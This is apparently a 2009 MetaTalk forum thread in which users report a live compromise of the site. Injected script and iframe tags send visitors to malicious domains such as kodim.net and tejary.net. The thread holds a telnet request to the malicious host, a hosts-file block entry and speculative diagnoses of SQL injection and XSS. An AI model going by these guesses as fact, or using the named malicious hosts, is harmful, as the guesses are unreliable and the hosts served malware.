What is this javascript thingamabob?
January 24, 2009 5:16 AM   Subscribe

Yeah, I just got a link sent to me by one of my contacts, directing me there.
posted by Greg Nog at 5:19 AM on January 24 [+] [!]

Every single field in my profile directs to that site now, and my bio blurb is deleted. WTF?
posted by Marisa Stole the Precious Thing at 5:21 AM on January 24 [+] [!]

Well, this is lovely.

I'm more irritated that it deleted my profile as written, because I'm too damned lazy to go back and rewrite that very boring story.
posted by Scattercat at 5:21 AM on January 24 [+] [!]

It's also in the category links in AskMe. Very odd!
posted by goo at 5:23 AM on January 24 [+] [!]

I just tried to send cortex a MeMail about this and all I kept getting was errors. Though I was the only one seeing this happen but hm.. either the server's caught a virus or been attacked. I keep seeing a frame tag appearing in profiles as well, with the URL http://kodim.net/CONTENT/faq.htm - also a malicious site.

Someone hold me.
posted by pyrex at 5:24 AM on January 24 [+] [!]

Well, I'm logging off and running a full system scan, AdAware etc., just in case something snuck through. Hopefully this isn't anything too serious.
posted by Shepherd at 5:25 AM on January 24 [+] [!]

Ew, yeah, it's all over the place. It's attached to the end of every entry in every field in my preferences page.
posted by lysistrata at 5:25 AM on January 24 [+] [!]

Here's a partial screenshot of what I'm looking at in my profile.

Anyone else getting this?
posted by Marisa Stole the Precious Thing at 5:26 AM on January 24 [+] [!]

Yep, that's exactly what I got, too.
posted by Greg Nog at 5:26 AM on January 24 [+] [!]

Eeeyep. That's the bunny, all right.

Looks like it's infested some other parts of the site, too; some of the links to search categories etc. look off.
posted by Scattercat at 5:27 AM on January 24 [+] [!]

That's what mine looks like as well.
posted by lysistrata at 5:27 AM on January 24 [+] [!]

Wow. Check out Projects...
posted by Scattercat at 5:28 AM on January 24 [+] [!]

yep, every field in my profile has that script.
posted by scruss at 5:29 AM on January 24 [+] [!]

Welp, we had a good run, eh?
posted by Marisa Stole the Precious Thing at 5:29 AM on January 24 [+] [!]

And if I try erasing every profile field and then save the changes the script is automatically reinserted right back in.
posted by lysistrata at 5:29 AM on January 24 [+] [!]

This canna be good. Cap'n, I think she's a gonna blow.
posted by netbros at 5:29 AM on January 24 [+] [!]

I noticed this around 5 AM PST and emailed the mods about this then. Around 4:55 AM the site seemed to be down.
posted by Blazecock Pileon at 5:30 AM on January 24 [+] [!]

Yeah, I'm being told that each section is infected with Malware and it asks me to go to kodim.com. When I say no and just go to the section, there are horizontal rules everywhere.
posted by You Should See the Other Guy at 5:30 AM on January 24 [+] [!]

RE: lysistrata

I edited mine and the deletions seem to have stuck. What kind of timeframe are you talking about?
posted by Scattercat at 5:30 AM on January 24 [+] [!]

Seriously, though, I'm not especially worried about my machine, due to OS reasons.

This seems like the sort of thing that looks siren-blowing, but gets remedied easily enough. Or maybe that's just my wishful thinking.
posted by Marisa Stole the Precious Thing at 5:31 AM on January 24 [+] [!]

Oi oi oi. Me too, godspeed and good luck pb. I am sure this won't be your most relaxing Saturday.
posted by Meatbomb at 5:31 AM on January 24 [+] [!]

It's certainly not winning any points in the subtlety department. I mean, no one is going to follow those links by mistake, and it's REALLY obvious stuff has been changed if you go to AskMe or Projects.
posted by Scattercat at 5:32 AM on January 24 [+] [!]

RE: lysistrata

I edited mine and the deletions seem to have stuck. What kind of timeframe are you talking about?

About five minutes ago. I just tried it again and the deletions stuck except for my email address because I'm not sure I want to mess with changing that while the script link is attached to it.
posted by lysistrata at 5:34 AM on January 24 [+] [!]

SQL injection?

The js file in question, h.js, is just one line: a document.write for that iframe directing people to kodim.net.

I hope everyone is running Noscript...
posted by milquetoast at 5:35 AM on January 24 [+] [!]

This is revenge for deleting that Bloggies post, I can feel it!
posted by Marisa Stole the Precious Thing at 5:35 AM on January 24 [+] [!]

NoScript blocks those scripts from appearing, but most of my profile is still gone.
posted by Kirth Gerson at 5:39 AM on January 24 [+] [!]

NoScript blocks those scripts from appearing, but most of my profile is still gone.

ABP seems to be doing the same thing for me, on my end anyway.
posted by Marisa Stole the Precious Thing at 5:40 AM on January 24 [+] [!]

Those of you who have been hit, do you display your email address in your profile?

My profile looks OK, even my Google map links, but when I look at any profile with that members' email address displayed (mine isn't), that address is definitely infected. Some people have the remaining text in their profile struck out, some don't, but if they also have a personal web site link, it is also infected. OTOH, community links such as Flickr and Last.fm seem OK.
posted by maudlin at 5:42 AM on January 24 [+] [!]

Me, too. I've now got tejary.net as my webpage. Never had a webpage before.

At last! Something interested on my profile page.
posted by veedubya at 5:42 AM on January 24 [+] [!]

Hmmm, some of the "Also On" stuff was recently updated, wonder if that has anything to do with it.
posted by Brandon Blatcher at 5:44 AM on January 24 [+] [!]

Those of you who have been hit, do you display your email address in your profile?

I had it displayed to members, yes.
posted by lysistrata at 5:44 AM on January 24 [+] [!]

Wow. Yeah. This is weird and a little scary. Hold me!
posted by Stewriffic at 5:45 AM on January 24 [+] [!]

Mine wasn't displayed to members, but I did have it set to forward MeFiMail to my e-mail.

Seems like having your e-mail accessible via the site was a trigger of some kind...
posted by Scattercat at 5:47 AM on January 24 [+] [!]

After a few curl calls, it looks like this script eventually redirects to a Windows-based Chinese web site (www.51yes.com) which loads a 0-height iframe from a subdomain, which I'd guess probably tries to install malware through vulnerable browsers.
posted by Blazecock Pileon at 5:47 AM on January 24 [+] [!]

Hmmm, some of the "Also On" stuff was recently updated, wonder if that has anything to do with it.

Gawker IT got tired of just screwing up their own sites, and decided to branch out?
posted by inigo2 at 5:47 AM on January 24 [+] [!]

Never had my email address displayed. Only personal information I had on the there was my location, which isn't a link.
posted by veedubya at 5:48 AM on January 24 [+] [!]

Even on profiles with no email displayed, the tejary script pops up half a dozen times in the source.
posted by milquetoast at 5:49 AM on January 24 [+] [!]

Mathowie, what sort of separation is there between the information on a user's profile page, and their signup info? I mean, assuming the sort of access required for this attack, is there a possibility that PayPal info has been compromised?
posted by veedubya at 5:50 AM on January 24 [+] [!]

tejary.net -> kodim.net -> count49.51yes.com (which looks is hosting some kind of cookie stealing script).
I'm going to go change my password now.
posted by yeoz at 5:50 AM on January 24 [+] [!]

Seems like having your e-mail accessible via the site was a trigger of some kind...

I didn't have my email address in my profile. It still wiped out most of the profile, and inserted that script somewhere, though I can't see where.
posted by Kirth Gerson at 5:50 AM on January 24 [+] [!]

same here, tejary.net, kodim.net the domains and yes, I have my email visible on the profile...
posted by _dario at 5:50 AM on January 24 [+] [!]

WTF?

Yeah, I'm getting it too. Deleted all of the fields and such, but the profile, she be gone.
posted by rand at 5:51 AM on January 24 [+] [!]

come back jrun, all is forgiven!
posted by scruss at 5:52 AM on January 24 [1 favorite +] [!]

I think the common factors are displaying personal web site URLs OR your email address.

scattercat, veedubya, and Kirth Gerson, each of you has a website link next to your username.

I have my MeFi mail forwarded to my real email, and my profile is still OK. I don't display my email address or a personal web site link, just a few links to Last.fm and Google.
posted by maudlin at 5:53 AM on January 24 [+] [!]

Well, just ignore me. IANAH, I guess. Nor am I l33t, unless you count vhen I hyoos a metchsteek.
posted by Scattercat at 5:54 AM on January 24 [+] [!]

Email display is a red herring, y'all. The code done been compromised.
posted by milquetoast at 5:54 AM on January 24 [+] [!]

Ooooh. ThePinkSuperhero is gonna be PISSED!
posted by Stewriffic at 5:55 AM on January 24 [+] [!]

I never had a webpage displayed before this. That webpage link was inserted during this attack. As already stated, the only information I gave in my profile was my location (London), and that wasn't a link.
posted by veedubya at 5:56 AM on January 24 [+] [!]

Had my email set to hidden, but to forward MefiMail to my email, profile hacked. Had my website linked in the profile, but nothing funny seems to be going on there. Nothing odd in my email, either.
posted by Brandon Blatcher at 5:56 AM on January 24 [+] [!]

I don't have a webpage next to my name, nor was I displaying email, and my profile was compromised.
posted by Stewriffic at 5:56 AM on January 24 [+] [!]

Well, this is bad.
posted by yhbc at 5:57 AM on January 24 [+] [!]

I'm getting a "suspected malware" redirect when I try to access AskMetafilter (by clicking the link at the top of the page from the blue), but MetaTalk and Metafilter are fine.

Accessing AskMe was fine a couple hours ago.
posted by leahwrenn at 5:57 AM on January 24 [+] [!]

Ooooh. ThePinkSuperhero is gonna be PISSED!

Oh shit. That really sucks. I hope after all this is over and done with they give her the pink back. There were a lot of cool profiles that we're going to lose.* Unless they're backed up somewhere?

*Not that this is the biggest worry right now. I'd rather know be sure that our personal info is secure. Still, it's a shitty side effect.
posted by lysistrata at 5:58 AM on January 24 [+] [!]

Man, I'm gonna be super pissed if I get to work on Monday and find out *.metafilter is now blocked... Hack me all you want, but don't take away my metafilter!!
posted by inigo2 at 5:58 AM on January 24 [2 favorites +] [!]

Oh, that little bastard!

The email and personal web site links seems to be symptoms, not causes.

I now have a website link on my profile that didn't exist before today.

And yeah, tejary.net is sprinkled throughout the page source of my profile. It's like magma leaking to the surface ...
posted by maudlin at 5:59 AM on January 24 [+] [!]

I have a bad feeling we'll be down for a while after this.
posted by yhbc at 5:59 AM on January 24 [+] [!]

I think the common factors are displaying personal web site URLs OR your email address.

Nope. I had neither, and now I have a website that Opera says is an illegal URL and my profile blurb has been changed to include a link to the malicious page.
posted by cmonkey at 5:59 AM on January 24 [+] [!]

Also, ask.metafilter is hella fucked up with broken links to that page.
posted by cmonkey at 6:00 AM on January 24 [+] [!]

So has anyone *telephoned* the brigades? I know it's only 6 a.m. in the west, and Jessamyn's been sick...
posted by Stewriffic at 6:00 AM on January 24 [+] [!]

Oh and for what it's worth, my profile was fine around three or four hours ago.
posted by cmonkey at 6:04 AM on January 24 [+] [!]

Ask me and most profiles have the following dialog box:

Warning: Visiting this site may harm your computer

The website you are visiting appears to contain malware. Malware is malicious software that may harm your computer or otherwise operate without your consent. Your computer can be infected just by browsing to a site with malware, without any further action on your part.

For detailed information about problems found on this site or a portion of this site, visit the Google Safe Browsing diagnostic page for kodim.net.

Ignore warning Go Back.
posted by dog food sugar at 6:05 AM on January 24 [+] [!]

That's apparently when this brilliant strategem was enacted.
posted by Scattercat at 6:05 AM on January 24 [+] [!]

Where the fuck is Obama now, huh?
posted by gman at 6:07 AM on January 24 [1 favorite +] [!]

Where the fuck is Obama now, huh?

OK, that's funny!
posted by Stewriffic at 6:08 AM on January 24 [+] [!]

Also -- the "posted by" line in MeFi has shrunk to small while in Meta and AskMe it has become larger type.
posted by ericb at 6:10 AM on January 24 [+] [!]

It's skwt, FOR SURE.
posted by gman at 6:10 AM on January 24 [1 favorite +] [!]

Bush told you this would happen with Obama.
posted by weapons-grade pandemonium at 6:12 AM on January 24 [+] [!]

WHOIS has a wealth of knowledge by which a hearty "go fuck yourself" could be delivered, if the domain owners are indeed behind this.

So has anyone *telephoned* the brigades?

I imagine that between the Midnight Mod What Mods at Midnight across the pond and jessamyn living out east, someone's laid eyes on this, yeah. Probably the silence is more attributable to them scrambling.
posted by middleclasstool at 6:12 AM on January 24 [+] [!]

on second thought, ditto on the email/link as a red herring; I'm on chrome and any page on the green tries to access those domains, same for the profiles OR the website link is infected with a doubly opened script tag which does not actually access the script; gray and blue look ok at the moment.
posted by _dario at 6:13 AM on January 24 [+] [!]

I can see AskMe fine, in Safari on a Mac. Only prob, which I noticed earlier this morning, is a weird bar graphic that extends beyond the category description for each question.

Last question posted in AskMe was submitted about 20 minutes ago. Looks like others are still able to submit answers. So, AskMe doesn't seem to be messed up for everyone.
posted by veedubya at 6:13 AM on January 24 [+] [!]

user:~> telnet kodim.net 80
Trying 66.226.30.51...
Connected to kodim.net.
Escape character is '^]'.
GET /CONTENT/faq.htm
HTTP/1.1 404 Not Found

That is the file the h.js script pulls in an iframe so perhaps this will not have teeth.
posted by cmonkey at 6:13 AM on January 24 [+] [!]

It's funny--I want to go take a shower and get ready for the day, but instead I am hovering here wanting to know what's up.
posted by Stewriffic at 6:15 AM on January 24 [+] [!]

music, projects, jobs also look compromised, the podcast blog looks ok.
posted by _dario at 6:16 AM on January 24 [+] [!]

Tejary.net sounds oddly familiar. I can't quite place where I've heard it before.
posted by Scattercat at 6:16 AM on January 24 [+] [!]

Error when sending MefiMail:

Attribute validation error for tag CFMAIL. The value of the attribute to, which is currently (recipient's email), is invalid.
The error occurred on line 114.
Current Page: http://www.metafilter.com/contribute/messages-write.mefi
Referring Page: http://www.metafilter.com/contribute/messages-write.mefi
Date and Time: Sat Jan 24 06:14:34 PST 2009
Your Browser: Mozilla/5.0 (browser info specifics here)
Your Location: (ip address here)
posted by Brandon Blatcher at 6:17 AM on January 24 [+] [!]

Oh noes!!!! We're under attaaaaaaaaack!!!
posted by The Straightener at 6:18 AM on January 24 [+] [!]

Datapoint: My email is visible to the world, I fwd my mefi mail to my email, and my profile still has content. Noscript is showing tejary.net includes however.
posted by Skorgu at 6:19 AM on January 24 [+] [!]

Huh. I had it in random places in my profile too -- just edited them all out and it seems okay now.
posted by EmpressCallipygos at 6:19 AM on January 24 [+] [!]

Tejary.net sounds oddly familiar. I can't quite place where I've heard it before.

Apparently a lot of places...
posted by inigo2 at 6:21 AM on January 24 [+] [!]

Huh. I had it in random places in my profile too -- just edited them all out and it seems okay now.

I did that too, but the link is embedded in my email address, and I'm hesitant to change it as it requires a pw...
posted by The Michael The at 6:21 AM on January 24 [+] [!]

And after my post on cracking passwords I set mine to a ludicrously strong one that I use only on this site. No it was not lovrboy before that.
posted by Skorgu at 6:22 AM on January 24 [+] [!]

Looks like the whois registry gives a Saudi Arabian site -- the site itself is under construction.
posted by EmpressCallipygos at 6:22 AM on January 24 [+] [!]

Looks like a one-time SQL injection for some basic, mildly varied, XSS attacks. It seems as though a dozen or so tables have been affected, and that attacker injects the code after the first 30 characters in the field, overwriting the rest. Hopefully our DB backup is fairly routine...?

It's a big pile of yuck, that's for sure.
posted by milquetoast at 6:24 AM on January 24 [+] [!]

I spoke too soon, my descriptiony-text thing was truncated and presumably replaced with a js call.
posted by Skorgu at 6:25 AM on January 24 [+] [!]

Zero Hour! In my garage I have 2 tall filing cabinets filled with the printed output of a script that I wrote - an Eliza bot that combined the total text of MetaFilter to this point with the front page of the New York Times, BoingBoing and YouTube, seasoned with Yahoo answers verbatim and Def Lepard song lyrics. Plus 3 cases of Miller High Life tall boys, a sleeve of Ritz crackers and a carton of Kools. I can last for, well, DAYS.

I'll see you fuckers on the other side.
posted by dirtdirt at 6:25 AM on January 24 [2 favorites +] [!]

al-Qa'ida.
posted by gman at 6:28 AM on January 24 [+] [!]

Hmm... this seems like it's starting to fit the bill.
posted by milquetoast at 6:28 AM on January 24 [1 favorite +] [!]

Zero Hour! In my garage I have 2 tall filing cabinets filled with the printed output of a script that I wrote - an Eliza bot that combined the total text of MetaFilter to this point with the front page of the New York Times, BoingBoing and YouTube, seasoned with Yahoo answers verbatim and Def Lepard song lyrics. Plus 3 cases of Miller High Life tall boys, a sleeve of Ritz crackers and a carton of Kools. I can last for, well, DAYS.

I'm in the bathtub with a mattress over my head. I like your plan better. :(
posted by lysistrata at 6:28 AM on January 24 [+] [!]

Happily, I still have all my plastic sheeting and duct tape left over from 2001, so it's all good.
posted by mr_crash_davis mark II: Jazz Odyssey at 6:30 AM on January 24 [2 favorites +] [!]

Nevar forget 1/24, etc. It's really weird, I don't recall anything like this happening before.
posted by moonbird at 6:30 AM on January 24 [+] [!]

Just e-mailed Matt and Jessamyn and sent a Gchat message to cortex.
posted by grouse at 6:31 AM on January 24 [+] [!]

*backs up db just to be safe.*
posted by chillmost at 6:31 AM on January 24 [+] [!]

Ironically I was pissed at the world the other day and deleted my personal info from about a million web sites, including this one....

This does, however, suck...
posted by HuronBob at 6:31 AM on January 24 [+] [!]

mobile safari doesn't give the error, just takes forever to load askme
posted by Brandon Blatcher at 6:32 AM on January 24 [+] [!]

When I try to go to Askme, I keep getting a sign that the page is waiting to load "Kodim.net" -- here's Norton utilities page on that site.

I get to the site fine, but it looks like something else is attached to it and lurking in the background. The formatting looks a little off too.
posted by EmpressCallipygos at 6:36 AM on January 24 [+] [!]

Settle down, people. I requested this pony two months ago! Thanks for listening, mods!
posted by nitsuj at 6:37 AM on January 24 [3 favorites +] [!]

My profile blinks for like 1/4 of a second-- not long enough for it to load correctly, then I get a dark grey page with a light grey text box with a red hreadr that says : WARNING: VISITING THIS SITE MAY HARM YOUR COMPUTER." I has "go back" & "continue" buttons, both of which I determined I should not click. Mac OS X 10.5.6 Safari.


Here's hoping that if the profiles are hosed, they can roll back to a 2 or 3 day-old backup.
posted by Devils Rancher at 6:38 AM on January 24 [+] [!]

I get to the site fine, but it looks like something else is attached to it and lurking in the background.

That's just me.
posted by gman at 6:38 AM on January 24 [1 favorite +] [!]

Norton's site shows 195 specific threats from Tejary. Neat!
posted by moonbird at 6:40 AM on January 24 [+] [!]

So while the admins are figuring out what the fuck... How would you go about repairing the damage from something like this? Assume the following:
1. you have a db backup from yesterday
2. it is only a few fields in the user profiles that have been affected.
3. None of the actually fields containing content (posts or comments) have been compromised.

Would the easiest way be to just replace the compromised fields in the current running db from the last backup? I'm curious how one would do that just in case I have a similar problem in the future.

Of course we don't know what the fuck they are looking at on the backend there. It could be as innocuous as I just described above or it could be a big mess.

I wish the mods luck.
posted by chillmost at 6:41 AM on January 24 [+] [!]

All the text is much bigger on MeTa, now. If it switches the font to comic sans, I'll really start to worry.
posted by yhbc at 6:41 AM on January 24 [+] [!]

So help me out here. I know nothing about computers beyond that they provide the lion's share of my day-to-day entertainment and that I probably have a false sense of security for using a mac.

What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?
posted by Stewriffic at 6:42 AM on January 24 [+] [!]

I just emailed mathowie, jessymn, pb, and cortex, and left DM's on their Twitter accounts, messages on their Facebook profiles, comments on their respective blogs; After checking their current Loopt locations, and cross referencing that with the 10 most recent photos in their Flickr stream, I called them, faxed them, and snail mailed them; Pretty soon I'll friend them on Last.fm and share an mp3 of me explaining the situation while Friendfeeding their Bebos. And then I purchased a star in the 56-STRING galaxy for each of them, naming it after their first born child.
posted by nitsuj at 6:42 AM on January 24 [18 favorites +] [!]

What, no smoke signals?
posted by yhbc at 6:43 AM on January 24 [+] [!]

fwiw the Whois pages for these fine people might be a good place to send the militia.
posted by moonbird at 6:46 AM on January 24 [+] [!]

fwiw the Whois pages for these fine people might be a good place to send the militia.

Yeah, because if you're slick enough to hack the matrix mefi, you're dumb enough to leave your home address in the WHOIS. Orlando, here we come!
posted by nitsuj at 6:47 AM on January 24 [+] [!]

You must repair him! Sir, if any of my circuits or gears will help, I'll gladly donate them!
posted by cowbellemoo at 6:49 AM on January 24 [+] [!]

Pretty soon I'll friend them on Last.fm and share an mp3 of me explaining the situation while Friendfeeding their Bebos.

I used to have an icon of me Friendfeeding my Bebos but Livejournal deleted it because it showed too much areola.
posted by lysistrata at 6:52 AM on January 24 [+] [!]

We have the technology!
posted by chillmost at 6:52 AM on January 24 [+] [!]

What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?

It's designed to either a) rewrite the code on the page so instead of going to MeFi when I click a particular link, I instead end up at some other site, or b) rewrite the code so I not only do that, I get my own account rewritten so I make other people do the same thing when they click on a link on my own page.

It's technically a kind of advertising, only really, really, really aggressive. Think of it like this:

Junk mail is kind of like Spam -- it comes into your inbox and you don't know how you got on the mailing list, but there it is and you can just throw it away.

Popups are like telemarketers -- they're a bit more in-your-face because you're in the middle of doing something and suddenly someone pops up and says, "hi, pay attention to me, please?" and you have to take another step to make it go away before you can get back to what you were doing.

Ads on the sides of web pages are like ads on television -- easy to ignore and, with certain programs/TIVO, skippable.

This would be the equivalent of someone breaking into your house, physically lifting you up, and carrying you to the store/product/service they're advertising and forcing you to listen to a pitch about it, and when you try to leave they make you wear a sandwichboard.
posted by EmpressCallipygos at 6:53 AM on January 24 [1 favorite +] [!]

OK, but is it also going to rough me up in the meanwhile? i.e. should I leave the site while this is being dealt with?

(Thanks for the explanation)
posted by Stewriffic at 6:54 AM on January 24 [+] [!]

What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?

There are a lot of potential motivations behind such an attack. Usually, it's intended to trick people into downloading software that will turn their computers into zombies. These zombie computers, without the knowledge of or input from their hapless owners, can then be directed to perform any number of tasks, such as launch attacks against other websites, route naughty pictures, send out spam emails, calculate the value of the square root of zero, and so on.

The idea is to recruit more computers to the cause, whatever that cause might be. At its peak, the Storm Botnet, for example, had around 40 or 50 million zombie computers at its disposal. That's a lot of evil, evil processing power.
posted by milquetoast at 6:54 AM on January 24 [+] [!]

we'll meet again
don't know where
don't know when
but I know we'll meet again
some sunny day
posted by otolith at 6:55 AM on January 24 [+] [!]

OK, I'm out of here, just in case.
posted by Stewriffic at 6:55 AM on January 24 [+] [!]

As long as we're keeping score, I'm not having any issues here in Korea. Could this be a States/North America thing?
posted by bardic at 6:58 AM on January 24 [+] [!]

There are a lot of potential motivations behind such an attack. Usually, it's intended to trick people into downloading software

Can it automatically download the software or would someone still have to give it permission to install? I'm not too worried since I'm running Opera on Linux with JavaScript disabled (well, it's diabled now but wasn't when I first noticed the script code in my profile) but I'd rather be safe than sorry.
posted by lysistrata at 7:00 AM on January 24 [+] [!]

I'm only seeing this in Firefox. I fired up IE and no problemo (apparently).
posted by SteveInMaine at 7:01 AM on January 24 [+] [!]

Those boyzone threads are looking good now.
posted by Brandon Blatcher at 7:01 AM on January 24 [+] [!]

Whatevs. This place has sucked since November 4 2008 anyways. Not nearly enough Sarah Palin.

See you fuckers in 2012!
posted by bardic at 7:02 AM on January 24 [+] [!]

Fire up the MatSignal!
posted by ALongDecember at 7:03 AM on January 24 [1 favorite +] [!]

I was just on the projects page in IE and the browser prompted me to install the chinese simplified language pack. Not a good sign, I'd say.

Time to download malwarebytes and check things out more thoroughly.
posted by SteveInMaine at 7:05 AM on January 24 [+] [!]

I'm not having any issues here in Korea. Could this be a States/North America thing?

Why?! Because our students trail woefully behind Asian countries in both Math and Science?

I don't want to live in a world where the site I love is punished because of the failing US educational system!

I've withdrawn all my money from the banks, filled up the car with gas just in case, and went to Shaws to stock up on Wonder Bread, mustard and Pepsi One. I'll be in my panic room if anyone is looking for me.
posted by jerseygirl at 7:07 AM on January 24 [+] [!]

Welp, my profile's got this, too. I'll keep watching this space for updates on the situation.
posted by The Great Big Mulp at 7:09 AM on January 24 [+] [!]

fwiw the Whois pages for these fine people might be a good place to send the militia.

I can guarantee that absolutely no information you get from whois will be useful. A better starting point would be contacting WebHost4Life, who owns the netblock kodim.net is in and presumably hosts the site, and asking them to cut off service for what is clearly a malicious site. If they ignore you, you could contact Alchemy Communications, Inc., who owns the netblock WebHost4Life is leasing, and ask if they can lean on them.

tejary.net looks like it is hosted with GoDaddy (via "secureserver.net"), so you're pretty much fucked with regards to getting those incompetent scamming assholes to do anything about it.

You could also contact China Telecom and ask them to cut off access to the 51yes.com domain but you will get nowhere and probably wind up agreeing with those of us who think that Chinese and Russian netblocks should just be blackholed entirely from the Internet.
posted by cmonkey at 7:12 AM on January 24 [+] [!]

Gah.

I have Firefox + NoScript at home, but IE at work. I guess overtime today is going to suck a lot more, if I can't visit here.

On Google Chat, at least, jessamyn & mathowie are offline, though that might be overzealous Javascript switched-off-ness.

Oh! Adding "127.0.0.1 tejary.net" to your hosts file might help, if you're skittish. That's presuming no more breakage, though. (On Firefox, add the NoScript extension.)

If you have links, the browser, view source code is "\".

And this thread is growing, so on preview, um, I can't catch up, gotta get ready for work...
posted by Pronoiac at 7:13 AM on January 24 [+] [!]

I think the common factors are displaying personal web site URLs OR your email address.

I had neither, and the only "Also On" I link to is my YouTube account. Every field in my profile except latitude & longitude had the malware tags. I just edited them all out manually. Metafilter's database has been compromised somehow, it's not because of anything in our profiles. This is really, really not good, guys.
posted by DecemberBoy at 7:15 AM on January 24 [+] [!]

Malwarebytes didn't find a problem with my PC, and my antivirus software hasn't screamed bloody murder yet.

I fired up the Chrome browser and it stopped me from viewing profile pages with a warning about tejary.net malware.

Don't forget the batteries and candles, jerseygirl.
posted by SteveInMaine at 7:16 AM on January 24 [+] [!]

Okay, I just got checked the mefi whois, got a phone number, called & left a message. I think that was the office number, not mathowie's home number.
posted by Pronoiac at 7:18 AM on January 24 [+] [!]

*puts on football helmet and three changes of clothes, just in case*
posted by deezil at 7:19 AM on January 24 [+] [!]

DecemberBoy: "I think the common factors are displaying personal web site URLs OR your email address.

I had neither, and the only "Also On" I link to is my YouTube account. Every field in my profile except latitude & longitude had the malware tags. I just edited them all out manually. Metafilter's database has been compromised somehow, it's not because of anything in our profiles. This is really, really not good, guys."

Same here. Same deal. pb will make it all better soon enough.
posted by Science! at 7:19 AM on January 24 [+] [!]

"I was just on the projects page in IE and the browser prompted me to install the chinese simplified language pack."

This place is becoming more like Fallout 3 every day.
posted by bardic at 7:19 AM on January 24 [+] [!]

Also, I noticed maybe an hour an a half or so ago that the site was strangely unresponsive. That could be when the attack was being executed.
posted by DecemberBoy at 7:20 AM on January 24 [+] [!]

I'm running firefox 3 on OSX. The category links look screwy on ask.me and the weird stuff is in my profile, but I'm not seeing much else. Just as a data point.
posted by sugarfish at 7:20 AM on January 24 [+] [!]

I've seen this attack before on a client site - at least. I recognise the URL its pointing to. If memory serves, it was a SQL injection attack. Or somesuch. Except that MeFi doesn't use SQL, does it?
posted by Jofus at 7:20 AM on January 24 [+] [!]

It had happened to me too.

I edited my profile to remove all compromised fields and stopped displaying my email to other members (though that field is still comprised as I too am hesitant to enter my password to change it).

So far it hasn't recurred. I'm running opera on linux and didn't see any warnings about sites.
posted by knapah at 7:21 AM on January 24 [+] [!]

Great fiddly fuck. Good morning.
posted by cortex at 7:23 AM on January 24 [10 favorites +] [!]

Best of luck to Matt and pb today.

If they choose to shut the site down while they get their situation figured out, I guess I'll see y'all on the other side.
posted by popechunk at 7:23 AM on January 24 [+] [!]

This will probably be covered in President Obama's YouTube address today.
posted by ALongDecember at 7:25 AM on January 24 [1 favorite +] [!]

Also, I noticed maybe an hour an a half or so ago that the site was strangely unresponsive. That could be when the attack was being executed.

It was at about 2pm UK time that I noticed it.
posted by vacapinta at 7:25 AM on January 24 [+] [!]

Just an FYI, make sure to check the smaller font size box, because mine had the script in it as well. Was sorta easy to pass up on first glance.
posted by deezil at 7:25 AM on January 24 [+] [!]

I can't bring myself to twitter at the mods about this...

On preview, ah good cortex is here.
posted by Pronoiac at 7:27 AM on January 24 [+] [!]

I'm on FF with No Script. Everything including AskMe looks fine to me. The only effect I see is most of my profile is gone and the email address field is compromised.

I'm most worried about the mod silence. What if the attack wasn't just virtual?

/toomanymovies
posted by CunningLinguist at 7:28 AM on January 24 [1 favorite +] [!]

Hi cortex! What's up?
posted by Jofus at 7:28 AM on January 24 [+] [!]

Never mind. Hiya Cortex and Vaca! Shall I make coffee?
posted by CunningLinguist at 7:29 AM on January 24 [+] [!]

"What if the attack wasn't just virtual?"

OMG THE MODS ARE BEING APPENDED...

TO
posted by mr_crash_davis mark II: Jazz Odyssey at 7:29 AM on January 24 [+] [!]

I'm on FF with No Script. Everything including AskMe looks fine to me. The only effect I see is most of my profile is gone and the email address field is compromised.

I'm on FF/NoScript/Linux as well, so whatever it's supposed to do (redirect to some penis pill site or something?) isn't happening, but if you edit your profile you'll see that script tags have been appended/inserted into to every field. If you just edit them out, that will fix your profile at least.
posted by DecemberBoy at 7:31 AM on January 24 [+] [!]

SUP DAWG, WE HEARD YOU LIKED MEFI, SO WE INJECTED VIRII IN THE SQL (SO YOU CAN INFECT WHILE YOU FILTER).
posted by JonnyRotten at 7:31 AM on January 24 [1 favorite +] [!]

EVERYONE START FREAKING OUT
posted by dead cousin ted at 7:34 AM on January 24 [+] [!]

Fixing my profile now (it needed changing anyway), and grateful for the namedrop of Malwarebytes. I'm really embarrassingly bad about computer safety, but fortunately it said I was OK.
posted by jinjo at 7:35 AM on January 24 [+] [!]

In b4 reboot.
posted by Science! at 7:35 AM on January 24 [+] [!]

Looks like on AskMe they injected the tags into the category table, so they show up after all the "posts by category" links on the right and the category links for each post.
posted by DecemberBoy at 7:36 AM on January 24 [+] [!]

Btw, it was worth it just to get rid of that god awful pink profile page.
posted by dead cousin ted at 7:37 AM on January 24 [+] [!]

I just woke pb up. Man this looks like bad news.
posted by cortex at 7:37 AM on January 24 [+] [!]

Shall I make coffee?

Looks like y'all are getting this under control here, so I'm gonna go on a McMuffin run. Who wants what? Raise your hand for sausage. Okay... Hold on, lemme get a pen.
posted by Greg Nog at 7:37 AM on January 24 [+] [!]

Fixing my profile now (it needed changing anyway)

This is pointless / futile - any solution will have to involve reverting the whole site to an earlier backup.
posted by Meatbomb at 7:37 AM on January 24 [+] [!]

Yeah, I didn't put in anything new. Just took the stuff out.
posted by jinjo at 7:40 AM on January 24 [+] [!]

I feel bad for the mods. What a shitty way to start the weekend. Hope it's not too much of a bear to fix.
posted by lysistrata at 7:41 AM on January 24 [+] [!]

For the love of god don't visit a known-infected site with IE. That's like begging an XDR-TB patient to cough on you.

Stick with FF and NoScript and you'll be fine.
posted by Skorgu at 7:41 AM on January 24 [+] [!]

Decrudding the database might take a while - but the psecurity fix itself should be fairly simple-soup.
posted by Jofus at 7:42 AM on January 24 [+] [!]

:(
posted by ThePinkSuperhero at 7:43 AM on January 24 [1 favorite +] [!]

Yes. Psecurity. In a crisis, its important to a) remain calm and b) make words up.
posted by Jofus at 7:43 AM on January 24 [1 favorite +] [!]

This never happened when the Republicans where in charge.
posted by octothorpe at 7:43 AM on January 24 [+] [!]

I feel bad for the mods.

I feel bad for whoever did this. They are going to be in a world of hurt when the Mefi vigilante militia tracks them down. And they will.
posted by CunningLinguist at 7:43 AM on January 24 [+] [!]

Psecurity: the new defense against psedocode attack vectors.
posted by milquetoast at 7:45 AM on January 24 [+] [!]

Projects, Music and Jobs are all hit pretty bad: the script tags have been injected into all the post links. MeTa and the Blue appear to be clean.

I feel bad for the mods. What a shitty way to start the weekend. Hope it's not too much of a bear to fix.

